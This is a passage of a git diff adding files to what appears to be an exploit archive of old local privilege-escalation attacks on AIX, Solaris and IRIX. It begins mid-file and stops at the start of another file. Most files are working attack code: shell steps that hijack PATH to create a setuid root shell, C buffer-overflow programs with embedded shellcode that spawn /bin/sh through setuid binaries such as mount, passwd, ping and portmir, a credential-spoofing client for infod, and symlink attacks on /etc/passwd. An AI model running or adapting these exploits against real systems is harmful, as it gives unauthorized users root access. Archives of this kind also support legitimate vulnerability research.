to 4700, exit and run the suid /tmp/bin/sh.

16
exploits/aix/local/19043.txt Normal file
View file

@ -0,0 +1,16 @@
source: https://www.securityfocus.com/bid/22/info
This applies to sites that have installed Sun Source tapes only.
The Sun distribution of sources (sunsrc) has an installation procedure which creates the directory /usr/release/bin and installs two setuid root files in it: makeinstall and winstall. These are both binary files which exec other programs: "make -k install" (makeinstall) or "install" (winstall) without a full path or reseting the PATH enviroment variable.
This makes it possible for users on that system to become root.
$ cp /bin/sh /tmp/sh
$ echo chmod 4777 /tmp/sh > /tmp/install
$ chmod a+rx /tmp/install
$ set PATH=/tmp:$PATH
$ export PATH
$ /usr/bin/winstall
$ /tmp/sh
#

6
exploits/aix/local/19045.txt Normal file
View file

@ -0,0 +1,6 @@
source: https://www.securityfocus.com/bid/59/info
/etc/crash was installed setgid kmem and excutable by anyone. Any user can use the ! shell command escape to executes commands, which are then performed with group set to kmem.
$ /etc/crash
! sh

13
exploits/aix/local/19213.sh Executable file
View file

@ -0,0 +1,13 @@
source: https://www.securityfocus.com/bid/268/info
A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges.
#!/bin/ksh
L=3000
STEP=34
MAX=16000
while [ $L -lt $MAX ]
do
./a.out $L
L=`expr $L + $STEP`
done

192
exploits/aix/local/19214.c Normal file
View file

@ -0,0 +1,192 @@
// source: https://www.securityfocus.com/bid/268/info
A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges.
/*
AIX 4.2/4.1 LC_MESSEGAS /usr/sbin/mount exploit by Georgi Guninski
----------------------------------------
DISCLAIMER
This program is for educational purpose ONLY. Do not use it without
permission.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski
is not liable for any damages caused by direct or indirect use of
the information or functionality provided by this program.
Georgi Guninski, his employer or any Internet provider bears NO
responsibility for content
or misuse of this program or any derivatives thereof.
By using this program you accept the fact that any damage (dataloss,
system
crash, system compromise, etc.) caused by the use of this program is
not
Georgi Guninski's responsibility.
In case you distribute this, please keep the disclaimer and my
addresses.
-----------------------------------------
Use the IBM C compiler.
Compile with: cc -g test2.c
-----------------
Georgi Guninski
guninski@hotmail.com
sgg@vmei.acad.bg
guninski@linux2.vmei.acad.bg
http://www.geocities.com/ResearchTriangle/1711
Suggestions,comments and job offers are welcome!
22-Mar-97
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char prog[100]="/usr/sbin/mount";
char prog2[30]="mount";
extern int execv();
char *createvar(char *name,char *value)
{
char *c;
int l;
l=strlen(name)+strlen(value)+4;
if (! (c=malloc(l))) {perror("error allocating");exit(2);};
strcpy(c,name);
strcat(c,"=");
strcat(c,value);
putenv(c);
return c;
}
/*The program*/
main(int argc,char **argv,char **env)
{
/*The code*/
unsigned int code[]={
0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
0x7c0903a6 , 0x4e800420, 0x0
};
/* disassembly
7c0802a6 mfspr r0,LR
9421fbb0 stu SP,-1104(SP) --get stack
90010458 st r0,1112(SP)
3c60f019 cau r3,r0,0xf019 --CTR
60632c48 lis r3,r3,11336 --CTR
90610440 st r3,1088(SP)
3c60d002 cau r3,r0,0xd002 --TOC
60634c0c lis r3,r3,19468 --TOC
90610444 st r3,1092(SP)
3c602f62 cau r3,r0,0x2f62 --'/bin/sh\x01'
6063696e lis r3,r3,26990
90610438 st r3,1080(SP)
3c602f73 cau r3,r0,0x2f73
60636801 lis r3,r3,26625
3863ffff addi r3,r3,-1
9061043c st r3,1084(SP) --terminate with 0
30610438 lis r3,SP,1080
7c842278 xor r4,r4,r4 --argv=NULL
80410440 lwz RTOC,1088(SP)
80010444 lwz r0,1092(SP) --jump
7c0903a6 mtspr CTR,r0
4e800420 bctr --jump
*/
#define MAXBUF 600
unsigned int buf[MAXBUF];
unsigned int frame[MAXBUF];
unsigned int i,nop,mn;
int max;
int QUIET=0;
int dobuf=0;
char VAR[30]="LC_MESSAGES";
unsigned int toc;
unsigned int eco;
unsigned int *pt;
char *t;
int egg=1;
int ch;
unsigned int reta; /* return address */
int corr=4604;
char *args[4];
char *newenv[8];
int justframes=1;
int startwith=0;
mn=78;
max=100;
if (argc>1)
corr = atoi(argv[1]);
pt=(unsigned *) &execv;
toc=*(pt+1);
eco=*pt;
if ( ((mn+strlen((char*)&code)/4)>max) || (max>MAXBUF) )
{
perror("Bad parameters");
exit(1);
}
#define OO 7
*((unsigned short *)code + OO + 2)=(unsigned short) (toc & 0x0000ffff);
*((unsigned short *)code + OO)=(unsigned short) ((toc >> 16) &
0x0000ffff);
*((unsigned short *)code + OO + 8 )=(unsigned short) (eco & 0x0000ffff);
*((unsigned short *)code + OO + 6 )=(unsigned short) ((eco >> 16) &
0x0000ffff);
reta=startwith ? (unsigned) &buf[mn]+corr : (unsigned)&buf[0]+corr;
for(nop=0;nop<mn;nop++)
buf[nop]=startwith ? reta : 0x4ffffb82; /*NOP*/
strcpy((char*)&buf[nop],(char*)&code);
i=nop+strlen( (char*) &code)/4-1;
if( !(reta & 0xff) || !(reta && 0xff00) || !(reta && 0xff0000)
|| !(reta && 0xff000000))
{
perror("Return address has zero");exit(5);
}
while(i++<max)
buf[i]=reta;
buf[i]=0;
for(i=0;i<max-1;i++)
frame[i]=reta;
frame[i]=0;
if(QUIET) {puts((char*)&buf);fflush(stdout);exit(0);};
puts("Start...");/*Here we go*/
newenv[0]=createvar("EGGSHEL",(char*)&buf[0]);
newenv[1]=createvar("EGGSHE2",(char*)&buf[0]);
newenv[2]=createvar("EGGSHE3",(char*)&buf[0]);
newenv[3]=createvar("EGGSHE4",(char*)&buf[0]);
newenv[4]=createvar("DISPLAY",getenv("DISPLAY"));
newenv[5]=VAR[0] ? createvar(VAR,justframes ? (char*)&frame :
(char*)&buf):NULL;
newenv[6]=NULL;
args[0]=prog2;
execve(prog,args,newenv);
perror("Error executing execve \n");
/* Georgi Guninski
guninski@hotmail.com
sgg@vmei.acad.bg
guninski@linux2.vmei.acad.bg
http://www.geocities.com/ResearchTriangle/1711
*/
}

84
exploits/aix/local/19215.c Normal file
View file

@ -0,0 +1,84 @@
/*
source: https://www.securityfocus.com/bid/268/info
A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges.
*/
/*============================================================
ex_lobc.c Overflow Exploits( for Sparc Edition)
The Shadow Penguin Security
(http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
offsets for 2.7/SPARC: 7144, 7152, 7160, 7168, and more...
offset for 2.6/SPARC: 5392
============================================================
*/
#define EV "LC_MESSAGES="
#define ADJUST 0
#define STARTADR 400
#define NOP 0xa61cc013
#define RETS 600
char x[80000];
char exploit_code[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2b\x0b\xda\xdc\xae\x15\x63\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c"
"\x94\x10\x20\x10\x94\x22\xa0\x10"
"\x9c\x03\xa0\x14"
"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08"
;
unsigned long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
int i;
unsigned int ret_adr;
main(int argc, char *argv[])
{
int OFFSET;
putenv("LANG=");
memset(x,'x',70000);
if (argc == 2)
OFFSET = atoi(argv[1]);
else
OFFSET = 5392; // default offset for 2.6
for (i = 0; i < ADJUST; i++) x[i]=0x40;
for (i = ADJUST; i < 1000; i+=4){
x[i+3]=NOP & 0xff;
x[i+2]=(NOP >> 8 ) &0xff;
x[i+1]=(NOP >> 16 ) &0xff;
x[i+0]=(NOP >> 24 ) &0xff;
}
for (i=0;i<strlen(exploit_code);i++) \
x[STARTADR+i+ADJUST]=exploit_code[i];
ret_adr=get_sp()-OFFSET;
printf("jumping address : %lx, offset = %d\n",ret_adr, OFFSET);
if ((ret_adr & 0xff) ==0 ){
ret_adr -=16;
printf("New jumping address : %lx\n",ret_adr);
}
for (i = ADJUST+RETS; i < RETS+600; i+=4){
x[i+3]=ret_adr & 0xff;
x[i+2]=(ret_adr >> 8 ) &0xff;
x[i+1]=(ret_adr >> 16 ) &0xff;
x[i+0]=(ret_adr >> 24 ) &0xff;
}
memcpy(x,EV,strlen(EV));
x[3000]=0;
putenv(x);
execl("/bin/rsh","su",(char *)0);
}

61
exploits/aix/local/19216.c Normal file
View file

@ -0,0 +1,61 @@
// source: https://www.securityfocus.com/bid/268/info
A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges.
#include <fcntl.h>
/* arpexp.c
arp overflow proof of concept by ahmed@securityfocus.com
shellcode originally written by Cheez Whiz.
tested on x86 solaris 7,8beta
default should work. if not, arg1 = offset. +- by 100's
Except for shellcode, copyright Security-Focus.com, 11/2000
*/
long get_esp() { __asm__("movl %esp,%eax"); }
int main(int ac, char **av)
{
char shell[] = "\xeb\x45\x9a\xff\xff\xff\xff\x07\xff"
"\xc3\x5e\x31\xc0\x89\x46\xb7\x88\x46"
"\xbc\x88\x46\x07\x89\x46\x0c\x31\xc0"
"\xb0\x2f\xe8\xe0\xff\xff\xff\x52\x52"
"\x31\xc0\xb0\xcb\xe8\xd5\xff\xff\xff"
"\x83\xc4\x08\x31\xc0\x50\x8d\x5e\x08"
"\x53\x8d\x1e\x89\x5e\x08\x53\xb0\x3b"
"\xe8\xbe\xff\xff\xff\x83\xc4\x0c\xe8"
"\xbe\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x73\x68\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff";
unsigned long magic = 0x8047b78;
unsigned long r = get_esp() + 600;
unsigned char buf[300];
int f;
if (ac == 2)
r += atoi(av[1]);
memset(buf,0x61,sizeof(buf));
memcpy(buf+52,&magic,4);
memcpy(buf+76,&r,4);
f = open("/tmp/ypx",O_CREAT|O_WRONLY,0600);
write(f,"1 2 3 4 ",8);
write(f,buf,sizeof(buf));
close(f);
memset(buf,0x90,sizeof(buf));
memcpy(buf,"LOL=",4);
memcpy(buf+(sizeof(buf)-strlen(shell)),shell,strlen(shell));
putenv(buf);
system("/usr/sbin/arp -f /tmp/ypx");
unlink("/tmp/ypx");
}

71
exploits/aix/local/19217.c Normal file
View file

@ -0,0 +1,71 @@
/*
source: https://www.securityfocus.com/bid/268/info
A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges.
*/
/*============================================================
ex_lobc.c Overflow Exploits( for Sparc Edition)
The Shadow Penguin Security
(http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
============================================================
*/
#define EV "LC_MESSAGES="
#define ADJUST 0
#define OFFSET 5392
#define STARTADR 400
#define NOP 0xa61cc013
#define RETS 600
char x[80000];
char exploit_code[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2b\x0b\xda\xdc\xae\x15\x63\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c"
"\x94\x10\x20\x10\x94\x22\xa0\x10"
"\x9c\x03\xa0\x14"
"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08"
;
unsigned long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
int i;
unsigned int ret_adr;
main()
{
putenv("LANG=");
memset(x,'x',70000);
for (i = 0; i < ADJUST; i++) x[i]=0x40;
for (i = ADJUST; i < 1000; i+=4){
x[i+3]=NOP & 0xff;
x[i+2]=(NOP >> 8 ) &0xff;
x[i+1]=(NOP >> 16 ) &0xff;
x[i+0]=(NOP >> 24 ) &0xff;
}
for (i=0;i<strlen(exploit_code);i++) x[STARTADR+i+ADJUST]=exploit_code[i];
ret_adr=get_sp()-OFFSET;
printf("jumping address : %lx\n",ret_adr);
if ((ret_adr & 0xff) ==0 ){
ret_adr -=16;
printf("New jumping address : %lx\n",ret_adr);
}
for (i = ADJUST+RETS; i < RETS+600; i+=4){
x[i+3]=ret_adr & 0xff;
x[i+2]=(ret_adr >> 8 ) &0xff;
x[i+1]=(ret_adr >> 16 ) &0xff;
x[i+0]=(ret_adr >> 24 ) &0xff;
}
memcpy(x,EV,strlen(EV));
x[3000]=0;
putenv(x);
execl("/bin/passwd","passwd",(char *)0);
}

14
exploits/aix/local/19229.txt Normal file
View file

@ -0,0 +1,14 @@
soure: https://www.securityfocus.com/bid/287/info
IBM's eNetwork Firewall for AIX contains a number of vulnerability in scripts which manipulate files insecurely. When fwlsuser script is run it creates a temporary file called /tmp/fwlsuser.PID ( where PID is the process ID of the command being run ). If this file is created previously and is a link to any other file the output generated by the fwlsuser script will overwrite this linked file.
x = 5000
while true
LOCAL FIX AS REPORTED BY ORIGINATOR:
ln -s /etc/passwd /tmp/fwlsuser.$x
# rm /tmp/fwlsuser.$x
let x=$x+1
echo $x
done
exit

226
exploits/aix/local/19287.c Normal file
View file

@ -0,0 +1,226 @@
/*
source: https://www.securityfocus.com/bid/370/info
Certain versions of AIX ship with an Information Daemon, infod. This program is designed to provide information about the OS and installed ancilliary programs. The daemon which runs as root, does not check credentials which are passed to it. This allows users to pass requests with arbitrary UID's. If a user passes infod a request as root, they can goto the default options menu and change the printer command line to an alternate binary such as /bin/sh that gives privileges to the account the session was spawned under.
*/
/* Infod AIX exploit (k) Arisme 21/11/98 - All Rights Reversed
Based on RSI.0011.11-09-98.AIX.INFOD (http://www.repsec.com)
Run program with the login you want to exploit :)
When the window appears, select "options", "defaults", change printer
to something more useful (like /bin/x11/xterm) and print !
Comments,questions : arisme@altern.org */
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <pwd.h>
#define TAILLE_BUFFER 2000
#define SOCK_PATH "/tmp/.info-help"
#define PWD "/tmp"
#define KOPY "Infod AIX exploit (k) Arisme 21/11/98\nAdvisory RSI.0011.11-09-98.AIX.INFOD (http://www.repsec.com)"
#define NOUSER "Use : infofun [login]"
#define UNKNOWN "User does not exist !"
#define OK "Waiting for magic window ... if you have problems check the xhost "
void send_environ(char *var,FILE *param)
{ char tempo[TAILLE_BUFFER];
int taille;
taille=strlen(var);
sprintf(tempo,"%c%s%c%c%c",taille,var,0,0,0);
fwrite(tempo,1,taille+4,param);
}
main(int argc,char** argv)
{ struct sockaddr_un sin,expediteur;
struct hostent *hp;
struct passwd *info;
int chaussette,taille_expediteur,port,taille_struct,taille_param;
char buffer[TAILLE_BUFFER],paramz[TAILLE_BUFFER],*disp,*pointeur;
FILE *param;
char *HOME,*LOGIN;
int UID,GID;
printf("\n\n%s\n\n",KOPY);
if (argc!=2) { printf("%s\n",NOUSER);
exit(1); }
info=getpwnam(argv[1]);
if (!info) { printf("%s\n",UNKNOWN);
exit(1); }
HOME=info->pw_dir;
LOGIN=info->pw_name;
UID=info->pw_uid;
GID=info->pw_gid;
param=fopen("/tmp/tempo.fun","wb");
chaussette=socket(AF_UNIX,SOCK_STREAM,0);
sin.sun_family=AF_UNIX;
strcpy(sin.sun_path,SOCK_PATH);
taille_struct=sizeof(struct sockaddr_un);
if (connect(chaussette,(struct sockaddr*)&sin,taille_struct)<0)
{ perror("connect");
exit(1); }
/* 0 0 PF_UID pf_UID 0 0 */
sprintf(buffer,"%c%c%c%c%c%c",0,0,UID>>8,UID-((UID>>8)*256),0,0);
fwrite(buffer,1,6,param);
/* PF_GID pf_GID */
sprintf(buffer,"%c%c",GID>>8,GID-((GID>>8)*256));
fwrite(buffer,1,2,param);
/* DISPLAY (259) */
bzero(buffer,TAILLE_BUFFER);
strcpy(buffer,getenv("DISPLAY"));
fwrite(buffer,1,259,param);
/* LANG (1 C 0 0 0 0 0 0 0) */
sprintf(buffer,"%c%c%c%c%c%c%c%c%c",1,67,0,0,0,0,0,0,0);
fwrite(buffer,1,9,param);
/* size_$HOME $HOME 0 0 0 */
send_environ(HOME,param);
/* size_$LOGNAME $LOGNAME 0 0 0 */
send_environ(LOGIN,param);
/* size_$USERNAME $USERNAME 0 0 0 */
send_environ(LOGIN,param);
/* size_$PWD $PWD 0 0 0 */
send_environ(PWD,param);
/* size_DISPLAY DISPLAY 0 0 0 */
//send_environ(ptsname(0),param);
/* If we send our pts, info_gr will crash as it has already changed UID *
/
send_environ("/dev/null",param);
/* It's probably not useful to copy all these environment vars but it was
good for debugging :) */
sprintf(buffer,"%c%c%c%c",23,0,0,0);
fwrite(buffer,1,4,param);
sprintf(buffer,"_=./startinfo");
send_environ(buffer,param);
sprintf(buffer,"TMPDIR=/tmp");
send_environ(buffer,param);
sprintf(buffer,"LANG=%s",getenv("LANG"));
send_environ(buffer,param);
sprintf(buffer,"LOGIN=%s",LOGIN);
send_environ(buffer,param);
sprintf(buffer,"NLSPATH=%s",getenv("NLSPATH"));
send_environ(buffer,param);
sprintf(buffer,"PATH=%s",getenv("PATH"));
send_environ(buffer,param);
sprintf(buffer,"%s","EDITOR=emacs");
send_environ(buffer,param);
sprintf(buffer,"LOGNAME=%s",LOGIN);
send_environ(buffer,param);
sprintf(buffer,"MAIL=/usr/spool/mail/%s",LOGIN);
send_environ(buffer,param);
sprintf(buffer,"HOSTNAME=%s",getenv("HOSTNAME"));
send_environ(buffer,param);
sprintf(buffer,"LOCPATH=%s",getenv("LOCPATH"));
send_environ(buffer,param);
sprintf(buffer,"%s","PS1=(exploited !) ");
send_environ(buffer,param);
sprintf(buffer,"USER=%s",LOGIN);
send_environ(buffer,param);
sprintf(buffer,"AUTHSTATE=%s",getenv("AUTHSTATE"));
send_environ(buffer,param);
sprintf(buffer,"DISPLAY=%s",getenv("DISPLAY"));
send_environ(buffer,param);
sprintf(buffer,"SHELL=%s",getenv("SHELL"));
send_environ(buffer,param);
sprintf(buffer,"%s","ODMDIR=/etc/objrepos");
send_environ(buffer,param);
sprintf(buffer,"HOME=%s",HOME);
send_environ(buffer,param);
sprintf(buffer,"%s","TERM=vt220");
send_environ(buffer,param);
sprintf(buffer,"%s","MAILMSG=[YOU HAVE NEW MAIL]");
send_environ(buffer,param);
sprintf(buffer,"PWD=%s",PWD);
send_environ(buffer,param);
sprintf(buffer,"%s","TZ=NFT-1");
send_environ(buffer,param);
sprintf(buffer,"%s","A__z=! LOGNAME");
send_environ(buffer,param);
/* Start info_gr with -q parameter or the process will be run locally and
not from the daemon ... */
sprintf(buffer,"%c%c%c%c",1,45,113,0);
fwrite(buffer,1,4,param);
fclose(param);
param=fopen("/tmp/tempo.fun","rb");
fseek(param,0,SEEK_END);
taille_param=ftell(param);
fseek(param,0,SEEK_SET);
fread(paramz,1,taille_param,param);
fclose(param);
unlink("/tmp/tempo.fun");
/* Thank you Mr daemon :) */
write(chaussette,paramz,taille_param);
printf("\n%s %s\n",OK,getenv("HOSTNAME"));
close(chaussette);
}

5
exploits/aix/local/19300.txt Normal file
View file

@ -0,0 +1,5 @@
source: https://www.securityfocus.com/bid/375/info
The snap command is a diagnostic utlitiy for gathering system information on AIX platforms. It can only be executed by root, but it copies various system files into /tmp/ibmsupt/ under /tmp/ibmsupt/general/ you will find the passwd file with cyphertext. The danger here is if a system administrator executes snap -a as sometimes requested by IBM support while diagnosing a problem it defeats password shadowing. /tmp/ibmsupt is created with 755 permissions they may carry out a symlink attack and gain access to the password file.
snap is a shell script which uses cp -p to gather system information. Data from /etc/security is gathered between lines 721 - 727. Seeing that snap uses the /tmp/ibmsupt/general directory someone may create the directory as a normal user (tested on on AIX 4.2.1). The user may then do a touch on /tmp/ibmsupt/general/passwd. Once the passwd file is created do tail -f /tmp/ibmsupt/general/passwd. If in another session someone loggs in as root and ran snap -a - this will cause the contents of the /etc/security/passwd to show up in tail command.

72
exploits/aix/local/19306.c Normal file
View file

@ -0,0 +1,72 @@
/*
source: https://www.securityfocus.com/bid/385/info
AIX version 4.2.1 introduced a new command titled 'portmir'. This new program had two notable vulnerabilites. First it contained a buffer overflow which allowed malicious users to obtain root privileges. Secondly it wrote it's log files to a world readable directly thereby exposing security relavent information.
*/
/*## copyright LAST STAGE OF DELIRIUM oct 2000 poland *://lsd-pl.net/ #*/
/*## /usr/bin/portmir #*/
/* note: to avoid potential system hang-up please, first obtain the exact */
/* AIX OS level with the use of the uname -a or oslevel commands */
#define ADRNUM 400
#define NOPNUM 16000
#define ALLIGN 2
char shellcode[]=
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" /* bnel <shellcode> */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x3b\xff\x01\x20" /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" /* st r3,-240(r31) */
"\x90\xbf\xff\x14" /* st r5,-236(r31) */
"\x88\x5f\xff\x0f" /* lbz r2,-241(r31) */
"\x98\xbf\xff\x0f" /* stb r5,-241(r31) */
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca */
"/bin/sh\xff"
;
char nop[]="\x7f\xff\xfb\x78";
main(int argc,char **argv,char **e){
char buffer[20000],adr[4],*b,*envp[2];
int i;
printf("copyright LAST STAGE OF DELIRIUM oct 2000 poland //lsd-pl.net/\n");
printf("/usr/sbin/portmir for aix 4.2 4.3 4.3.x PowerPC/POWER\n\n");
if(argc<2){
printf("usage: %s 42|43|433\n",argv[0]);exit(-1);
}
switch(atoi(argv[1])){
case 42: shellcode[55]=0x02; break;
case 43: shellcode[55]=0x04; break;
case 433: shellcode[55]=0x03; break;
default: exit(-1);
}
i=0; while(*e++) i+=strlen(*e)+1;
*((unsigned long*)adr)=(unsigned long)e+(i&~3)-8000;
envp[0]=&buffer[1000];
envp[1]=0;
b=buffer;
for(i=0;i<ALLIGN;i++) *b++=adr[i%4];
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
*b=0;
b=&buffer[1000];
sprintf(b,"xxx=");b+=4;
for(i=0;i<ALLIGN;i++) *b++=' ';
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
*b=0;
execle("/usr/sbin/portmir","lsd","-t",buffer,0,envp);
}

104
exploits/aix/local/19307.c Normal file
View file

@ -0,0 +1,104 @@
// source: https://www.securityfocus.com/bid/387/info
A buffer overflow condition exists in some versions of /usr/sbin/ping under AIX. Given that ping is SUID root, this overflow allows malicious users to gain root from it.
/*
*
* /usr/sbin/ping exploit (kinda' coded) by BeastMaster V
*
* CREDITS: this is simpy a modified version of an exploit
* posted by Georgi Guninski (guninski@hotmail.com)
*
* This will give a #rootshell# by overwriting a buffer
* in /usr/sbin/ping while ping is setuid to root.
* This exploit is designed for AIX 4.x on PPC platform.
*
*
* USAGE:
* $ cc -o foo -g aix_ping.c
* $ ./foo 5100
* #
*
*
* HINT: Try giving ranges from 5090 through 5500
*
* DISCLAIMER: use this program in a responsible manner.
*
* --> don't forget to visit http://www.rootshell.com
* --> for more goodies :-)
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
extern int execv();
#define MAXBUF 600
unsigned int code[]={
0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
0x7c0903a6 , 0x4e800420, 0x0
};
char *createvar(char *name,char *value)
{
char *c;
int l;
l=strlen(name)+strlen(value)+4;
if (! (c=malloc(l))) {perror("error allocating");exit(2);};
strcpy(c,name);
strcat(c,"=");
strcat(c,value);
putenv(c);
return c;
}
main(int argc,char **argv,char **env)
{
unsigned int buf[MAXBUF],frame[MAXBUF],i,nop,toc,eco,*pt;
int min=100, max=280;
unsigned int return_address;
char *newenv[8];
char *args[4];
int offset=5300;
if (argc==2) offset = atoi(argv[1]);
pt=(unsigned *) &execv; toc=*(pt+1); eco=*pt;
*((unsigned short *)code+9)=(unsigned short) (toc & 0x0000ffff);
*((unsigned short *)code+7)=(unsigned short) ((toc >> 16) & 0x0000ffff)
;
*((unsigned short *)code+15)=(unsigned short) (eco & 0x0000ffff);
*((unsigned short *)code+13)=(unsigned short) ((eco >> 16) & 0x0000ffff
);
return_address=(unsigned)&buf[0]+offset;
for(nop=0;nop<min;nop++) buf[nop]=0x4ffffb82;
strcpy((char*)&buf[nop],(char*)&code);
i=nop+strlen( (char*) &code)/4-1;
for(i=0;i<max-1;i++) frame[i]=return_address;
frame[i]=0;
newenv[0]=createvar("EGGSHEL",(char*)&buf[0]);
newenv[1]=createvar("EGGSHE2",(char*)&buf[0]);
newenv[2]=createvar("EGGSHE3",(char*)&buf[0]);
newenv[3]=createvar("EGGSHE4",(char*)&buf[0]);
newenv[4]=createvar("DISPLAY",getenv("DISPLAY"));
newenv[5]=NULL;
args[0]="ping";
args[1]=(char*)&frame[0];
execve("/usr/sbin/ping",args,newenv);
perror("Error executing execve \n");
}

101
exploits/aix/local/19309.c Normal file
View file

@ -0,0 +1,101 @@
/*
source: https://www.securityfocus.com/bid/389/info
A buffer overflow can occur in lchangelv under some versions of AIX. Note that an attacker must already have the GID or EGID of 'system' to execute lchangelv.
Because lchangelv is SUID root, this overflow will grant the attacker root privileges.
*/
/*
*
* /usr/sbin/lchangelv (kinda' coded) by BeastMaster V
*
* CREDITS: this is simply a modified version of an exploit
* posted by Georgi Guninski (guninski@hotmail.com)
*
* NOTES: you must have gid or egid of (system) to run this.
*
* USAGE:
* $ cc -o foo -g aix_lchangelv.c
* $ ./foo 5100
* #
*
*
* HINT: Try giving ranges from 5090 through 5500
*
* DISCLAIMER: use this program in a responsible manner.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
extern int execv();
#define MAXBUF 600
unsigned int code[]={
0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
0x7c0903a6 , 0x4e800420, 0x0
};
char *createvar(char *name,char *value)
{
char *c;
int l;
l=strlen(name)+strlen(value)+4;
if (! (c=malloc(l))) {perror("error allocating");exit(2);};
strcpy(c,name);
strcat(c,"=");
strcat(c,value);
putenv(c);
return c;
}
main(int argc,char **argv,char **env)
{
unsigned int buf[MAXBUF],frame[MAXBUF],i,nop,toc,eco,*pt;
int min=100, max=280;
unsigned int return_address;
char *newenv[8];
char *args[4];
int offset=3200;
if (argc==2) offset = atoi(argv[1]);
pt=(unsigned *) &execv; toc=*(pt+1); eco=*pt;
*((unsigned short *)code+9)=(unsigned short) (toc & 0x0000ffff);
*((unsigned short *)code+7)=(unsigned short) ((toc >> 16) & 0x0000ffff);
*((unsigned short *)code+15)=(unsigned short) (eco & 0x0000ffff);
*((unsigned short *)code+13)=(unsigned short) ((eco >> 16) & 0x0000ffff);
return_address=(unsigned)&buf[0]+offset;
for(nop=0;nop<min;nop++) buf[nop]=0x4ffffb82;
strcpy((char*)&buf[nop],(char*)&code);
i=nop+strlen( (char*) &code)/4-1;
for(i=0;i<max-1;i++) frame[i]=return_address;
frame[i]=0;
newenv[0]=createvar("EGGSHEL",(char*)&buf[0]);
newenv[1]=createvar("EGGSHE2",(char*)&buf[0]);
newenv[2]=createvar("EGGSHE3",(char*)&buf[0]);
newenv[3]=createvar("EGGSHE4",(char*)&buf[0]);
newenv[4]=createvar("DISPLAY",getenv("DISPLAY"));
newenv[5]=NULL;
args[0]="lchangelv";
args[1]="-l";
args[2]=(char*)&frame[0];
execve("/usr/sbin/lchangelv",args,newenv);
perror("Error executing execve \n");
}

113
exploits/aix/local/19318.c Normal file
View file

@ -0,0 +1,113 @@
// source: https://www.securityfocus.com/bid/417/info
A buffer overrun exists in the permissions program, as shipped by Silicon Graphics with the 5.x and 6.x Irix operating system. By supplying a long, well crafted buffer as the 4th argument to the program, arbitrary code can be executed as group sys.
/* /usr/lib/desktop/permissions exploit by DCRH 26/5/97
*
* This gives you egid = sys
*
* Tested on: R8000 Power Challenge (Irix64 6.2)
*
* Exploit doesn't work on Irix 5.x due to stack position
*
* compile as: cc -n32 perm.c
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
